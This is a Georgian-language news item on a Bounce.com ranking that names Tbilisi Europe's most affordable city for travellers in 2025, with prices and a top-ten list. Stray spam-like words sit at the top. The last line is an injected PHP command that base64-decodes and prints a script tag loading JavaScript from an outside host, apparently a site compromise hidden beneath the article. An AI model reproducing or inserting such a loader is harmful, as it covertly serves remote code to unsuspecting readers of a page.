global distribution
გარე ავეჯი

2025 წელს მოგზაურებისთვის ევროპაში ყველაზე ხელმისაწვდომ ქალაქად თბილისი დასახელდა - შესაბამისი რეიტინგი Bounce.com-მა გამოაქვეყნა. რეიტინგში თბილისმა 10-დან 8.37 ქულა მიიღო.

Bounce-ს თანახმადაც საქართველოს დედაქალაქში ორი ღამის (შაბათ-კვირა) სასტუმროში გატარება 162 ევრო დაგიჯდებათ. ამასთან, ამავე რეიტინგის მიხედვით, 2 პერსონაზე 2-3 კერძიანი კვების ღირებულებად 78 ევრო არის მიჩნეული, 2 ბოთლი ღვინის საშუალო ფასი 13 ევროა, ტაქსით 2 მგზავრობის საშუალო ფასი 3.90 ევრო, საზოგადოებრივი ტრანსპორტით 4 ცალმხრივი ბილეთის საშუალო ფასი კი 1.28 ევროა.

თბილისი მოგზაურებისთვის ყველაზე ხელმისაწვდომი ევროპული ქალაქია რეიტინგის ათეულში შემდეგი ევროპული ქალაქები მოხვდა:

1. თბილისი (საქართველო)
2. ორადეა (რუმინეთი)
3. კრაიოვ ა (რუმინეთი
4. ბუდაპეშტი (უნგრეთი)
5. ტიმისოარა (რუმინეთი)
6. პრაღა (ჩეხეთი)
7. კორდობა (ესპანეთი)
8. ბრნო (ჩეხეთი)
9. ზაგრები (ხორვატია)
10.გდანსკი (პოლონეთი)
აღსანიშნავია, რომ კვლევისას გუნდმა ევროპის 70 ქალაქში სასტუმროების, კვების, სასმელებისა და ტრანსპორტის საშუალო ფასები, ასევე უფასო ღირსშესანიშნაობების რაოდენობა გააანალიზა.

207
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");